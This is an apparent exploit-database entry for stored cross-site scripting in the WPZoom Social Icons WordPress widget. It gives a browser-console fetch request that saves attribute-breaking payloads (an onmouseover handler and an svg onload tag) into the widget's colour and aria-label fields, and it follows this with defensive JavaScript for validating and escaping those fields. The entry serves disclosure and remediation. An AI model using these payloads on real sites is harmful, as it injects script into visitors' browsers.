## https://sploitus.com/exploit?id=WPEX-ID:B8661FBE-78B9-4D29-90BF-5B68AF468EB6
1. As an administrator, visit /wp-admin/widgets.php and add a Social Icons from WPZoom Widget
2. Open your browser's console, and paste the following command:

```javascript
// Saves the widget through admin-ajax.php with the same form fields the widgets screen
// submits. The test payloads sit in the color_picker_fields and aria_label_fields values;
// the nonce is read from the hidden _wpnonce_widgets input on widgets.php.
await fetch("/wp-admin/admin-ajax.php", {
  "credentials": "include",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": `widget-zoom-social-icons-widget%5B2%5D%5Btitle%5D=Follow+us&widget-zoom-social-icons-widget%5B2%5D%5Bdescription%5D=asdasd&widget-zoom-social-icons-widget%5B2%5D%5Bopen_new_tab%5D=true&widget-zoom-social-icons-widget%5B2%5D%5Bicon_alignment%5D=none&widget-zoom-social-icons-widget%5B2%5D%5Bicon_style%5D=with-canvas&widget-zoom-social-icons-widget%5B2%5D%5Bicon_canvas_style%5D=round&widget-zoom-social-icons-widget%5B2%5D%5Bicon_padding_size%5D=8&widget-zoom-social-icons-widget%5B2%5D%5Bicon_font_size%5D=18&widget-zoom-social-icons-widget%5B2%5D%5Bglobal_color_picker%5D=%231e73be&widget-zoom-social-icons-widget%5B2%5D%5Bglobal_color_picker_hover%5D=%231e73be&widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Ffacebook.com%2F&widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=Facebook&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=123%22%20onmouseover=%27alert(/XSS/)%27&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%230866FF&widget-zoom-social-icons-widget%5B2%5D%5Bicon_fields%5D%5B%5D=facebook&widget-zoom-social-icons-widget%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon&widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=%27%20%3e%3csvg/onload=alert(123)//%3e&widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Fx.com%2F&widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=X&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=%23000000&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%23000000&widget-zoom-social-icons-widget%5B2%5D%5Bicon_fields%5D%5B%5D=x&widget-zoom-social-icons-widget%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon&widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=&widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Finstagram.com%2F&widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=Instagram&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=%23e4405f&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%23e4405f&widget-zoom-social-icons-widget%5B2%5D%5Bicon_fields%5D%5B%5D=instagram&widget-zoom-social-icons-widget%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon&widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=&widget-id=zoom-social-icons-widget-2&id_base=zoom-social-icons-widget&widget-width=250&widget-height=200&widget_number=-1&multi_number=2&add_new=&action=save-widget&savewidgets=${_wpnonce_widgets.value}&sidebar=sidebar-1`,
  "method": "POST",
  "mode": "cors"
});
```
3. Visit the site's homepage and notice that the test alert boxes execute.
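The root cause the steps above demonstrate is that per-icon widget fields (a colour value and an aria-label) are stored and later echoed into HTML attributes without validation or escaping. As an added example, not code from this sploitus entry or from the WPZoom plugin, the JavaScript below shows the defensive handling such fields need: the URL-encoded form body is parsed with `URLSearchParams`, colour and URL fields are checked against a strict allow-list, and free-text fields are escaped for attribute context before rendering. The function names (`parseIconFields`, `sanitizeColor`, `sanitizeUrl`, `escapeAttr`, `renderIcon`) are hypothetical, and `SAMPLE_BODY` is a constructed subset of the PoC request body containing the same two test payloads.

```javascript
// Constructed sample: a subset of the widget-save body from the PoC above,
// with the two attribute-breaking values in color_picker_fields and aria_label_fields.
const SAMPLE_BODY = [
  "widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Ffacebook.com%2F",
  "widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=Facebook",
  "widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=123%22%20onmouseover=%27alert(/XSS/)%27",
  "widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=%27%20%3e%3csvg/onload=alert(123)//%3e",
  "widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Fx.com%2F",
  "widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=X",
  "widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=%23000000",
  "widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=",
].join("&");

// Decode the repeated "[]" fields for widget instance 2 into one object per icon.
// Field names mirror the PoC's form keys; the object shape is hypothetical.
function parseIconFields(body) {
  const params = new URLSearchParams(body);
  const prefix = "widget-zoom-social-icons-widget[2]";
  const field = (name) => params.getAll(`${prefix}[${name}][]`);
  return field("url_fields").map((url, i) => ({
    url,
    label: field("label_fields")[i] ?? "",
    color: field("color_picker_fields")[i] ?? "",
    ariaLabel: field("aria_label_fields")[i] ?? "",
  }));
}

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Allow-list validation: a colour is only ever a 6-digit hex value.
// Anything else (including the PoC's attribute-injection string) falls back to a default.
const HEX_COLOR = /^#[0-9a-fA-F]{6}$/;
function sanitizeColor(value, fallback = "#000000") {
  return HEX_COLOR.test(value) ? value.toLowerCase() : fallback;
}

// Allow-list validation for link targets: only absolute http(s) URLs survive,
// so escaping alone is not relied on to stop non-HTTP schemes in href.
function sanitizeUrl(value) {
  try {
    const u = new URL(value);
    return u.protocol === "http:" || u.protocol === "https:" ? u.href : "";
  } catch {
    return "";
  }
}

// Render one icon link with every field validated or escaped for its context.
function renderIcon(icon) {
  const href = escapeAttr(sanitizeUrl(icon.url));
  const color = sanitizeColor(icon.color);
  return (
    `<a href="${href}" aria-label="${escapeAttr(icon.ariaLabel)}"` +
    ` style="color: ${color};">${escapeAttr(icon.label)}</a>`
  );
}

function renderWidget(body) {
  return parseIconFields(body).map(renderIcon).join("\n");
}

console.log(renderWidget(SAMPLE_BODY));
```

The two controls do different jobs: `sanitizeColor` and `sanitizeUrl` reject input that does not match the expected shape (a colour that contains a quote is simply not a colour), while `escapeAttr` handles genuinely free-text fields such as the label and aria-label, where the content must be kept but must not be able to close the attribute. In a WordPress plugin the equivalent calls are `sanitize_hex_color()` / `esc_url()` on save and `esc_attr()` on output.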